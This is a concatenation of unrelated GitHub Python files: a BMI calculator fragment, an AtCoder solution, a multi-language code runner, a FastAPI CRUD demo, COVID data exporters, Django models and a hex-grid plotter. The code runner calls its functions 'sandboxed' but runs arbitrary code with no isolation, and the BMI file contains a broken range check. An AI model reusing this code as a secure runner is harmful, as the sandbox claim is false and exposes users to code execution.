tkinter.Label()\nresultLabel.pack()\n\ndef writeResult (bmi):\n resultString = f\"Your BMI is : {round(bmi, 2)}. 
You are \"\n if bmi <= 16:\n resultString += \"severely thin !\"\n elif 16 < bmi <= 17:\n resultString += \"moderately thin\"\n elif 17 < bmi <= 17-18.5:\n resultString += \"mild thin\"\n elif 18.5 < bmi <= 25:\n resultString += \"normal\"\n elif 25 < bmi <= 30:\n resultString += \"overweight\"\n elif 30 < bmi <= 35:\n resultString += \"obese class 1 !\"\n elif 35 < bmi <= 40:\n resultString += \"obese class 2 !!\"\n else:\n resultString += \"obese class 3 !!!\"\n\n return resultString\n\nwindow.mainloop()\n","repo_name":"wancett/bmiCalculator","sub_path":"BMI_Calculator.py","file_name":"BMI_Calculator.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15107378069","text":"N=int(input())\nxyh=sorted([list(map(int, input().split())) for _ in range(N)], key=lambda x: x[2], reverse=True)\n\ndef find(cx, cy, H):\n\tfor x,y,h in xyh:\n\t\tif h != max(H-abs(x-cx)-abs(y-cy), 0):\n\t\t\treturn False\n\treturn True\n\ndef solve():\n\tfor cx in range(101):\n\t\tfor cy in range(101):\n\t\t\tx,y,h = xyh[0]\n\t\t\tH = h + abs(x-cx) + abs(y-cy)\n\t\t\tif find(cx, cy, H):\n\t\t\t\treturn \"%d %d %d\" % (cx, cy, H)\n\traise Exception\n\nprint(solve())","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc112/C/4915849.py","file_name":"4915849.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"19533875288","text":"#code_runner.py\nimport os\nimport subprocess\ndef execute_sandboxed_code(code, language):\n if language == \"python\":\n return execute_python_sandboxed(code)\n elif language == \"c\":\n return execute_c_sandboxed(code)\n elif language == \"java\":\n return execute_java_sandboxed(code)\n elif language == \"exe\":\n return execute_exe_sandboxed(code)\n elif language == \"net\":\n return execute_net_sandboxed(code)\n elif language == \"rust\":\n return execute_rust_sandboxed(code)\n\ndef execute_python_sandboxed(code):\n try:\n exec(code, {})\n return \"Code executed successfully.\"\n except Exception as e:\n return f\"Error executing Python code: {e}\"\n\ndef execute_c_sandboxed(code):\n with open(\"temp.c\", \"w\") as f:\n f.write(code)\n\n try:\n subprocess.run([\"gcc\", \"temp.c\", \"-o\", \"temp\"], check=True)\n result = subprocess.run([\"./temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running C code: {e}\"\n\ndef execute_java_sandboxed(code):\n with open(\"Temp.java\", \"w\") as f:\n f.write(code)\n\n try:\n subprocess.run([\"javac\", \"Temp.java\"], check=True)\n result = subprocess.run([\"java\", \"Temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running Java code: {e}\"\n\ndef execute_exe_sandboxed(exe_path):\n try:\n result = subprocess.run([exe_path], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error running the .exe file: {e}\"\n\ndef execute_net_sandboxed(code):\n try:\n with open(\"temp.cs\", \"w\") as f:\n f.write(code)\n result = subprocess.run([\"dotnet\", \"run\", \"--no-build\", \"--project\", \"temp.csproj\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error running .NET code: {e}\"\n\ndef execute_rust_sandboxed(code):\n try:\n 
with open(\"temp.rs\", \"w\") as f:\n f.write(code)\n subprocess.run([\"rustc\", \"temp.rs\", \"-o\", \"temp\"], check=True)\n result = subprocess.run([\"./temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running Rust code: {e}\"\n\ndef execute_code(language, code):\n if language not in [\"python\", \"c\", \"java\", \"exe\", \"net\", \"rust\"]:\n return \"Unsupported language.\"\n\n result = execute_sandboxed_code(code, language)\n return result\n\ndef find_files_with_extension(root_dir, extension):\n found_files = []\n for root, _, files in os.walk(root_dir):\n for file in files:\n if file.endswith(extension):\n found_files.append(os.path.join(root, file))\n return found_files\n\ndef main():\n execution_option = input(\"Choose an option:\\n1. Execute code from a file\\n2. Execute code directly\\n3. quit\\n\")\n\n if execution_option == \"1\":\n language = input(\"Enter a programming language (python, c, java, exe, net, rust): \")\n extension_mapping = {\n \"python\": \".py\",\n \"c\": \".c\",\n \"java\": \".java\",\n \"exe\": \".exe\",\n \"net\": \".cs\",\n \"rust\": \".rs\"\n }\n\n if language not in extension_mapping:\n print(\"Unsupported language.\")\n return\n\n root_folder = os.getcwd() # Get the current working directory as the root folder\n file_extension = extension_mapping[language]\n matching_files = find_files_with_extension(root_folder, file_extension)\n\n if not matching_files:\n print(f\"No {language} files found in the specified folder and its subfolders.\")\n return\n\n print(f\"Found {len(matching_files)} {language} files:\")\n for i, file_path in enumerate(matching_files, start=1):\n print(f\"{i}. {file_path}\")\n\n file_number = int(input(\"Select a file number to execute: \")) - 1\n\n try:\n if language in [\"exe\", \"net\", \"rust\"]:\n selected_file = matching_files[file_number]\n else:\n with open(matching_files[file_number], \"r\") as f:\n code = f.read()\n except IndexError:\n print(\"Invalid file number.\")\n return\n except FileNotFoundError:\n print(\"Selected file not found.\")\n return\n\n elif execution_option == \"2\":\n language = input(\"Enter a programming language (python, c, java, exe, net, rust): \")\n if language in [\"exe\", \"net\", \"rust\"]:\n selected_file = input(f\"Enter the path to the {language} file: \")\n else:\n code = input(\"Enter the code:\\n\")\n elif execution_option ==\"3\":\n print(\"Exiting...\")\n return\n\n else:\n print(\"Invalid option.\")\n return\n\n if language in [\"exe\", \"net\", \"rust\"]:\n output = execute_code(language, selected_file)\n else:\n output = execute_code(language, code)\n print(output)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Okerew/Py-OS","sub_path":"code_runner.py","file_name":"code_runner.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11024902261","text":"# pip install fastapi\n# pip install uvicorn\nfrom typing import List\n\nimport fastapi\nimport uvicorn\nimport pydantic\n\napp = fastapi.FastAPI()\n\napp.fruits = [\n {'name': 'apple', 'color': 'red', 'taste': 'sweet'},\n {'name': 'banana', 'color': 'yellow', 'taste': 'sweet'},\n {'name': 'tomato', 'color': 'red', 'taste': 'sweet'}\n]\n\n\nclass Fruit(pydantic.BaseModel):\n name: str\n color: str\n taste: str\n\n\n# GET SINGLE\n@app.get('/fruits/{name}', response_model=Fruit)\ndef retrieve_fruit(name):\n for fruit in app.fruits:\n if 
fruit['name'] == name:\n            return fruit\n\n    return None\n\n\n# GET ALL\n@app.get('/fruits', response_model=List[Fruit])\ndef retrieve_fruits():\n    return app.fruits\n\n\n# POST\n@app.post('/fruits', response_model=Fruit)\ndef create_fruit(data: Fruit):\n    app.fruits.append(data.dict())\n    return data\n\n\n# PUT\n@app.put('/fruits/{name}', response_model=Fruit)\ndef update_fruit(data: Fruit, name):\n    new_fruits = []\n    for fruit in app.fruits:\n        if fruit['name'] != name:\n            new_fruits.append(fruit)\n\n    new_fruits.append(data.dict())\n    app.fruits = new_fruits\n\n    return data\n\n\n# DELETE\n@app.delete('/fruits/{name}')\ndef delete_fruit(name):\n    new_fruits = []\n    for fruit in app.fruits:\n        if fruit['name'] != name:\n            new_fruits.append(fruit)\n    app.fruits = new_fruits\n    return None\n\n\nuvicorn.run(app, host='0.0.0.0', port=9001)\n","repo_name":"mpdevilleres/python-study-2021","sub_path":"day6/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7014397577","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtPrintSupport import *\n\n\nclass Window(QWidget):\n    def __init__(self):\n        super(Window, self).__init__()\n        self.edit = QTextEdit()\n        self.print_btn = QPushButton('Print')\n        self.print_btn.clicked.connect(self.print_text)\n\n        self.printer = QPrinter()\n\n        v_layout = QVBoxLayout()\n        v_layout.addWidget(self.edit)\n        v_layout.addWidget(self.print_btn)\n        self.setLayout(v_layout)\n\n    def print_text(self):\n        print_dialog = QPrintDialog(self.printer)\n        if print_dialog.exec():\n            self.edit.print(self.printer)\n\n\nif __name__ == '__main__':\n    app = QApplication([])\n    window = Window()\n    window.show()\n    sys.exit(app.exec())","repo_name":"la-vie-est-belle/book-codes","sub_path":"第6章/示例代码6-15/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4075793159","text":"from pathlib import Path\nimport itertools\n\nimport pandas as pd\nimport numpy as np\nimport re\nimport datetime\n#from utils import convert_to_int\n\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 1000)\n\nDATA_FOLDER = Path(\"data-desc\")\n\nVARIABLES = [\n    \"Totaal\",\n    \"Ziekenhuisopname\",\n    \"Overleden\"\n]\n\n\ndef get_timeline():\n\n    df = pd.read_csv(Path(\"data\", \"rivm_NL_covid19_sex.csv\"))\n    dates = sorted(df[\"Datum\"].unique())\n\n    return dates\n\n\ndef export_date(df, data_folder, prefix, data_date=None, label=None):\n\n    if data_date:\n        df_date = df.loc[df[\"Datum\"] == data_date, :]\n    else:\n        df_date = df\n\n    # export with data date\n    if label is not None:\n        export_path = Path(DATA_FOLDER, data_folder, f\"{prefix}_{label}.csv\")\n    else:\n        export_path = Path(DATA_FOLDER, data_folder, f\"{prefix}.csv\")\n\n    print(f\"Export {export_path}\")\n    df_date.to_csv(export_path, index=False)\n\n\n\ndef main_sex():\n\n    df_reported = pd.read_csv(Path(\"data-desc\", \"data-sex\", \"RIVM_NL_sex.csv\"))\n    df_reported[\"Aantal\"] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n    dates = sorted(df_reported[\"Datum\"].unique())\n\n    # export by date\n    for data_date in dates:\n\n        export_date(df_reported, \"data-sex\", \"RIVM_NL_sex\", data_date, str(data_date).replace(\"-\", \"\"))\n\n    # export latest\n    export_date(df_reported, \"data-sex\", \"RIVM_NL_sex\", data_date=dates[-1], 
label=\"latest\")\n\n\ndef main_age():\n\n df_reported = pd.read_csv(Path(\"data-desc\", \"data-age\", \"RIVM_NL_age.csv\"))\n df_reported[\"Aantal\"] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n dates = sorted(df_reported[\"Datum\"].unique())\n\n # export by date\n for data_date in dates:\n\n export_date(df_reported, \"data-age\", \"RIVM_NL_age\", data_date, str(data_date).replace(\"-\", \"\"))\n\n # export latest\n export_date(df_reported, \"data-age\", \"RIVM_NL_age\", data_date=dates[-1], label=\"latest\")\n\n\ndef main_age_sex():\n\n DATA_FOLDER_INPUT = Path(\"raw_data/website_charts\")\n files = DATA_FOLDER_INPUT.glob('*leeftijd-en-geslacht-overledenen*')\n\n df = []\n for file in files:\n match = re.search('\\d{4}-\\d{2}-\\d{2}', f'{file}')\n date = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n\n new = pd.read_csv(file, sep = ';')\n new['Datum'] = date\n\n genders = ['Vrouw', 'Man']\n\n for geslacht in genders:\n new_man = new[[\n \"Datum\",\n \"Leeftijdsgroep\",\n geslacht\n ]]\n\n new_man['Geslacht'] = geslacht\n new_man = new_man.rename(columns={geslacht:'AantalCumulatief', 'Leeftijdsgroep':'LeeftijdGroep'})\n\n df.append(new_man)\n\n\n df_reported = pd.concat(df, axis=0, ignore_index=True)\n df_reported = df_reported.sort_values(by = ['Datum', 'Geslacht', 'LeeftijdGroep'])\n\n df_reported[\"Aantal\"] = df_reported \\\n .groupby(['Geslacht', 'LeeftijdGroep'], sort=True)['AantalCumulatief'] \\\n .transform(pd.Series.diff)\n\n df_reported.loc[df_reported[\"Datum\"] == sorted(df_reported[\"Datum\"].unique())[0], \"Aantal\"] = \\\n df_reported.loc[df_reported[\"Datum\"] == sorted(df_reported[\"Datum\"].unique())[0], \"AantalCumulatief\"]\n\n df_reported['Aantal'] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n Path(DATA_FOLDER, \"data-deceased\").mkdir(exist_ok=True)\n\n df_reported = df_reported[[\n \"Datum\",\n \"LeeftijdGroep\",\n \"Geslacht\",\n \"Aantal\",\n \"AantalCumulatief\"\n ]]\n\n dates = sorted(df_reported[\"Datum\"].unique())\n\n # export by date\n for data_date in dates:\n\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date, str(data_date).replace(\"-\", \"\"))\n\n # export latest\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date=dates[-1], label=\"latest\")\n\n # export all\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date=None, label=None)\n\n\n\nif __name__ == '__main__':\n\n DATA_FOLDER.mkdir(exist_ok=True)\n\n main_sex()\n\n main_age()\n\n main_age_sex()\n\n\n","repo_name":"J535D165/CoronaWatchNL","sub_path":"workflows/rivm/data_rivm_desc.py","file_name":"data_rivm_desc.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"72"} +{"seq_id":"24817651296","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.postgres.fields import JSONField\n\nfrom address.models import AddressField\nfrom andablog.models import Entry\n\nfrom social.apps.django_app.default.models import UserSocialAuth\nfrom datetime import datetime\n\n# RIDE STUFF\nclass Campaign(models.Model):\n created_at = models.DateTimeField(auto_now=True)\n owner = models.ForeignKey(User, blank=True, null=True)\n name = models.CharField(max_length=128, blank=False, null=False)\n about = models.TextField(blank=True, null=True)\n\n def __unicode__(self):\n return self.name\n\nclass Ride(models.Model):\n 
uploaded = models.DateTimeField(auto_now=True)\n    campaign = models.ForeignKey(Campaign)\n    trackfile = models.FileField(upload_to='rides')\n\n    def __unicode__(self):\n        return self.trackfile.name\n\nclass Course(models.Model):\n    uploaded = models.DateTimeField(auto_now=True)\n    campaign = models.ForeignKey(Campaign)\n    trackfile = models.FileField(upload_to='courses')\n\n    def __unicode__(self):\n        return self.trackfile.name\n\nclass PointOfInterest(models.Model):\n    created_at = models.DateTimeField(default=datetime.now)\n    campaign = models.ForeignKey(Campaign, null=False, blank=False)\n    lat = models.DecimalField(max_digits=9, decimal_places=6)\n    lng = models.DecimalField(max_digits=9, decimal_places=6)\n\nclass EntryPointOfInterest(models.Model):\n    poi = models.ForeignKey(PointOfInterest, null=False)\n    entry = models.ForeignKey(Entry, null=False, blank=False)\n\nclass InstagramPointOfInterest(models.Model):\n    poi = models.ForeignKey(PointOfInterest, null=False)\n    user_social_auth = models.ForeignKey(UserSocialAuth, blank=False, null=False)\n    shortcode = models.CharField(max_length=128, blank=False, null=False)\n    cached_response = JSONField(default=dict)\n\nclass TextPointOfInterest(models.Model):\n    poi = models.ForeignKey(PointOfInterest, null=False)\n    text = models.TextField()\n\n# FINANCIALS\nclass FinancialCategory(models.Model):\n    user = models.ForeignKey(User)\n    name = models.CharField(max_length=128, unique=True, null=False, blank=False)\n\nclass FinancialEntry(models.Model):\n    user = models.ForeignKey(User)\n    campaign = models.ForeignKey(Campaign, null=True, blank=True)\n    category = models.ForeignKey(FinancialCategory)\n    value = models.DecimalField(max_digits=12, decimal_places=2)\n\n# MISC. STUFF\nclass Contact(models.Model):\n    user = models.ForeignKey(User, null=True, blank=True)\n    name = models.CharField(max_length=128)\n    phone_number = models.CharField(max_length=128, null=True, blank=True)\n    address = AddressField(null=True, blank=True)\n    notes = models.TextField(null=True, blank=True)\n","repo_name":"qpfiffer/blackdog","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"403442732","text":"ten = [i for i in range(1,11)]\nevens = list(filter(lambda x: x % 2 == 0, ten))\nup = list(map(lambda x: x**2, evens))\n\nprint(f'Generated list ten from 1 to 10: {ten}')\nprint(f'Even numbers from list ten {evens}')\nprint(f'Squared numbers from list evens {up}')\n\ndef show_Idx(lst=ten):\n    try:\n        print(lst)\n        Idx = int(input('Enter the index of the list item you want to print: '))\n        if Idx >= 0 and Idx <= len(lst) - 1:\n            print(f'At index {Idx} is the object: {lst[Idx]}')\n        else:\n            print(f\"Enter an index only from 0 to {len(lst) - 1}\")\n    except Exception:\n        print(\"Enter numbers only!\")\n\n\nwhile 1:\n    command = input('Choose an action: \\n1) Print the item at an index\\n0) Exit\\n')\n    if command == '1':\n        show_Idx()\n    elif command == '0':\n        print(\"Program finished\")\n        break\n    else:\n        print('No such menu option, enter only 1 or 0!')\n        continue","repo_name":"mirlan312/HomWorks","sub_path":"venv/Include/mirlan_idirisov_hw_6.py","file_name":"mirlan_idirisov_hw_6.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21388382804","text":"import csv\nfrom ast import literal_eval as make_tuple\nimport fiona\nimport os\nimport 
numpy as np\nimport itertools\nimport random\nimport pickle\nimport rasterio\nfrom rasterio import features\nfrom shapely.geometry import shape\nimport subprocess\nimport re\nimport math\nimport sys\n\n\ndef zeropad_filename(fn,n=4):\n return re.sub(\n '(\\d+)',\n lambda m: m.group().zfill(n),\n fn)\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\n\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\nclass HexNeighbors:\n \"\"\" Provides cached methods to get the indicies of neighboring cells in hexagonal grid\n\n Methods for finding neighbors in a hexgaonal grid. Assumes hexgonal grid uses\n axial coordinate system x,y,z (http://www.redblobgames.com/grids/hexagons/#coordinates).\n Coordinates are calculated for a rings of hexagons, with caching to speed the process\n for repeat calls to the class.\n\n \"\"\"\n\n def __init__(self):\n self.cache = {}\n\n def get_ring_offset(self, distance):\n \"\"\"\n Return the indices for a ring of hexagons at 'distance' from an origin hexagon of (0,0,0)\n :param distance: int\n :return: list\n \"\"\"\n if distance in self.cache:\n return self.cache[distance]\n else:\n coords_positive = list(zip(range(0, distance + 1), range(distance, -1, -1)))\n coords_negative = list(zip(range(-distance, 1), range(0, -distance - 1, -1)))\n\n all_coords = list(set(itertools.chain([(x, y, -distance) for (x, y) in coords_positive],\n [(-distance, y, z) for (z, y) in coords_positive],\n [(x, -distance, z) for (z, x) in coords_positive],\n [(x, y, distance) for (x, y) in coords_negative],\n [(x, distance, z) for (x, z) in coords_negative],\n [(distance, y, z) for (z, y) in coords_negative])))\n\n self.cache[distance] = all_coords\n print(\"cache extended to {} units ({})\".format(distance, convert_size(sys.getsizeof(self.cache))))\n\n return all_coords\n\n def get_radius_offset(self, distance):\n \"\"\"\n Return indices of all hexagons within radius 'distance'.\n :param distance: int\n :return: list\n \"\"\"\n return flatten([self.get_ring_offset(i) for i in range(distance + 1)])\n\n def get_ring_coords(self, distance, origin=(0, 0, 0)):\n \"\"\"\n Return indices of all hexagons in a ring at 'distance' from specified origin.\n :param distance: int\n :param origin: tuple\n :return: list\n \"\"\"\n x_, y_, z_ = origin\n return [(x_ + x, y_ + y, z_ + z) for x, y, z in self.get_ring_offset(distance)]\n\n def get_radius_coords(self, distance, origin=(0, 0, 0)):\n x_, y_, z_ = origin\n return [(x_ + x, y_ + y, z_ + z) for x, y, z in self.get_radius_offset(distance)]\n\n\ndef inv_logit(p):\n \"\"\"Return inverse logit of p\"\"\"\n return np.exp(p) / (1 + np.exp(p))\n\n\nclass IBMmap:\n def __init__(self):\n self.hexes = {}\n self.neighbor_manager = HexNeighbors()\n # Sim annealing variable\n self.T = 1\n self.T_min = 0.00001\n self.alpha = 0.9\n\n def pickle(self, path):\n with open(path, 'wb') as hex_pickle:\n return pickle.dump(self.hexes, hex_pickle)\n\n def from_pickle(self, path):\n with open(path, 'rb') as hex_pickle:\n self.hexes = pickle.load(hex_pickle)\n\n def get_neighbors(self, hex, distance):\n return [self.hexes.get(hex) for hex in self.neighbor_manager.get_radius_coords(distance, hex.axial_coords)]\n\n def get_neighbors_ring(self, hex, distance):\n return [self.hexes.get(hex) for hex in 
self.neighbor_manager.get_ring_coords(distance, hex.axial_coords)]\n\n def get_suitability(self, hexes=None):\n if not hexes:\n self.suitability = np.nansum(\n [self.hexes[hex].get_quality() for hex in self.hexes if self.hexes[hex].properties['occupied'] == 1])\n return self.suitability\n else:\n return np.nansum(\n [self.hexes[hex].get_quality() for hex in hexes if self.hexes[hex].properties['occupied'] == 1])\n\n def get_occupied(self):\n self.occupied = set([hex for hex in self.hexes if self.hexes[hex].properties['occupied'] == 1])\n\n def get_unoccupied(self):\n self.unoccupied = set([hex for hex in self.hexes if self.hexes[hex].properties['occupied'] == 0])\n\n def set_keys_list(self):\n self.keys_list = list(self.hexes)\n\n def accept(self, new, old):\n return np.exp((new - old) / self.T) > random.random()\n\n def test_accept(self):\n backupT = self.T\n self.T = 1\n assert self.accept(1, 0) == True\n print(\"annealing acceptance test 1 passed\")\n\n self.T = 0.0000001\n assert self.accept(1, 0) == True\n print(\"annealing acceptance test 2 passed\")\n\n self.T = 10\n assert self.accept(0, 1) == True\n print(\"annealing acceptance test 3 passed\")\n\n self.T = 0.0000001\n assert self.accept(0, 1) == False\n print(\"all annealing acceptance tests passed\")\n self.T = backupT\n\n def update_T(self):\n self.T = max(self.T * self.alpha, self.T_min)\n\n def switch(self):\n found_occupied = False\n found_unoccupied = False\n while not found_occupied:\n occ = random.sample(self.keys_list, 1)[0]\n found_occupied = self.hexes[occ].properties['occupied'] == 1\n while not found_unoccupied:\n unocc = random.sample(self.keys_list, 1)[0]\n found_unoccupied = self.hexes[unocc].properties['occupied'] == 0\n previous_suitability = self.hexes[occ].get_quality()\n new_suitability = self.hexes[unocc].get_quality()\n # if new_suitability >= previous_suitability:\n # self.hexes[occ].properties['occupied'] = 0\n # self.hexes[unocc].properties['occupied'] = 1\n if self.accept(new_suitability, previous_suitability):\n self.hexes[occ].properties['occupied'] = 0\n self.hexes[unocc].properties['occupied'] = 1\n\n\nclass Hex:\n def __init__(self, grid, axial, properties):\n self.grid = grid\n self.axial_coords = axial\n self.properties = properties\n self.fon = False\n\n def __repr__(self):\n return \"Hex at {} {} {}\".format(*self.axial_coords)\n\n @property\n def fono(self):\n if not self.fon:\n self.fon = self.grid.get_neighbors(self, 1)\n return np.sum([x.properties['occupied'] for x in self.fon if x is not None])\n\n def get_neighbors(self, distance):\n return self.grid.get_neighbors(self, distance)\n\n def get_neighbors_ring(self, distance):\n return self.grid.get_neighbors_ring(self, distance)\n\n def get_quality(self):\n p = -3.6 - 0.0004 * self.properties['flow'] - 0.0005 * self.properties['distance'] + 0.0005 * self.properties[\n 'elevation'] + 1.6 * self.fono\n return inv_logit(p)\n\n\ndef load_state(path):\n with open(path, 'r') as f:\n reader = csv.reader(f)\n hexkeys = [make_tuple(key[0]) for key in reader]\n return hexkeys\n\n\ndef parse_filename(self, filename: str):\n return int(filename.split('_')[0])\n\nclass CstLineHolder:\n def __init__(self):\n self.properties = {}\n with fiona.collection('coastline/beagle_cst.shp', 'r') as layer:\n for element in layer:\n self.properties['geom'] = shape(element['geometry'])\n self.properties['col'] = 100\n\ndef load_ages(path):\n with open(path, 'r') as f:\n reader = csv.reader(f)\n ages = [int(row[1]) for row in reader]\n return ages\n\nclass Plotter:\n 
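# Rasterises saved hex-grid states over the coastline template and writes colour-mapped GeoTIFF frames.\n    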
def __init__(self):\n        self.transform = [-2398667.8006973956,\n                          0.06537704951100207,\n                          0.0,\n                          1700808.706766952,\n                          0.0,\n                          -0.3837805797099703]\n        self.shape = (3735, 18220)\n\n        self.keys = None\n        self.template = IBMmap()\n        self.template.from_pickle('hex_map_sim_anneal')\n        self.template.hexes['COASTLINE'] = CstLineHolder()\n        print(\"template loaded.\")\n\n        self.temp_files = []\n\n    def _shapes(self):\n        return ((self.template.hexes[key].properties['geom'], age) for key,age in zip(self.keys,self.ages))\n\n    def rasterise_keys(self, keys):\n        self.keys = ['COASTLINE']\n        self.keys += keys\n        return features.rasterize(self._shapes(), out_shape=self.shape, transform=self.transform)\n\n    def reconstruct(self, path):\n        outpath = os.path.split(path)[0]\n        print(\"outpath : \",outpath)\n        filename = os.path.splitext(os.path.split(path)[1])[0]\n        out_filename = zeropad_filename(filename)\n        print(\"outfilename : \",out_filename)\n        out_filename = '{}.tif'.format(os.path.join(outpath,out_filename))\n        print(\"outfilename : \",out_filename)\n        keys = load_state(path=path)\n        self.ages = [255] + load_ages(path=path)\n        image = self.rasterise_keys(keys)\n        print('rasterised')\n        with rasterio.open(out_filename, 'w', driver='GTiff', width=self.shape[1], height=self.shape[0], count=1,\n                           dtype='uint8') as dst:\n            dst.write(image, 1)\n            dst.write_colormap(\n\n                1, {\n\n                    0: (229, 245, 249),\n                    1: (214, 238, 236),\n                    2: (198, 231, 223),\n                    3: (183, 224, 211),\n                    4: (167, 217, 198),\n                    5: (152, 210, 185),\n                    6: (136, 203, 172),\n                    7: (121, 197, 159),\n                    8: (106, 190, 146),\n                    9: (90, 183, 133),\n                    10: (75, 176, 121),\n                    11: (59, 169, 108),\n                    12: (44, 162, 95),\n                    13: (44, 162, 95),\n                    14: (44, 162, 95),\n                    15: (44, 162, 95),\n                    16: (44, 162, 95),\n                    17: (44, 162, 95),\n                    18: (44, 162, 95),\n                    19: (44, 162, 95),\n                    20: (44, 162, 95),\n                    21: (44, 162, 95),\n                    22: (44, 162, 95),\n                    23: (44, 162, 95),\n                    24: (44, 162, 95),\n                    25: (44, 162, 95) })\n        self.temp_files.append(out_filename)\n\n    def to_video(self,path):\n        result_code = subprocess.call(\"ffmpeg -framerate 25 -pattern_type glob -i '{}*_state.tif' {}output.mp4 -y\".format(path,path), shell=True)\n\n    def clean_up(self):\n        while self.temp_files:\n            file = self.temp_files.pop()\n            os.remove(file)\n            print(\"removed tmp file {}\".format(file))\n    \nif __name__ == \"__main__\":\n    import glob\n    import os\n\n    root = 'output'\n    plotter = Plotter()\n\n    for p in os.listdir(root):\n        path = os.path.join(root,p+\"/\")\n        print(\"searching in {}\".format(path))\n        paths = glob.glob(path+'*_state.csv')\n        print('paths = ',paths)\n        for image_path in paths:\n            print('path = ',image_path)\n            plotter.reconstruct(image_path)\n    #        plotter.to_video(path)\n    #        plotter.clean_up()\n\n\n\n\n","repo_name":"emmatalis/emma_hexibm","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71808695913","text":"import os\nfrom functools import partial\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Callable, Union\nfrom typing import Any\n\nfrom gemtoolsio import load_string, load_file, load_encrypted_file\n\nfrom .exceptions import critical, ArgumentError\n\nKEY_RESULT = '__result__'\n\nDEFAULT_PATH = '.'\n\nDEFAULT_CONFIG_PATH = 'config.toml'\n\n_MISSING = object()\n\n\ndef get_argument(kwargs: dict,\n                 name: str,\n                 default: Any = _MISSING,\n                 choices: list[Any] = None\n                 ) -> Any:\n    \"\"\"\n    Return the value of the specified argument from a dictionary of keyword arguments.\n\n    :param kwargs: A 
dictionary of keyword arguments to search for the specified argument name.\n    :type kwargs: dict\n    :param name: The name of the argument to retrieve.\n    :type name: str\n    :param default: The default value to return if the argument is not present in kwargs.\n        Defaults to _MISSING, which indicates that no default value is specified.\n    :type default: Any, optional\n    :param choices: A list of valid choices for the argument value. If specified and the argument\n        value is not in the list, raise an ArgumentError.\n    :type choices: list[Any], optional\n    :return: The value of the specified argument in kwargs, or the default value if not present.\n    :rtype: Any\n    :raises: ArgumentError: If the specified argument is required and not present in kwargs,\n        or if the argument value is not in the list of valid choices.\n    \"\"\"\n    value = kwargs.get(name, default)\n    if value is _MISSING:\n        critical(f'Missing required argument \"{name}\" in {kwargs}.', ArgumentError)\n    if choices is not None and value not in choices:\n        critical(f'Argument \"{name}\" must be one of {choices}, got {value}.', ArgumentError)\n\n    return value\n\n\nLoadingHandler = Callable[[dict], dict]\n\"\"\"\nA loading handler is a callable that takes a dictionary containing configuration data as input\nand returns a dictionary containing configuration data as output. It can be used to transform or\nfilter configuration data during loading.\n\nThe final handler returns a dict containing the KEY_RESULT key; the value associated with it is\nthe final configuration data.\n\"\"\"\n\nLazyHandler = Callable[[dict], dict]\n\"\"\"\nA lazy handler is a callable that takes a dictionary containing configuration data as input\nand returns a dictionary containing configuration data as output. It can be used to transform or\nfilter configuration data lazily, i.e. on-demand when the data is accessed for the first time.\n\"\"\"\n\n\ndef from_source(params: dict) -> dict:\n    \"\"\"\n    Load configuration data from a string source.\n\n    :param params: A dictionary containing parameters for loading configuration data.\n        The dictionary must contain the following keys:\n        - 'text': The string containing the configuration data to load.\n        - 'format': The format of the configuration data.\n    :type params: dict\n    :return: A dictionary containing the loaded configuration data under the KEY_RESULT key.\n    :rtype: dict\n    \"\"\"\n    source_text = get_argument(params, 'text')\n    source_format = get_argument(params, 'format')\n    params[KEY_RESULT] = 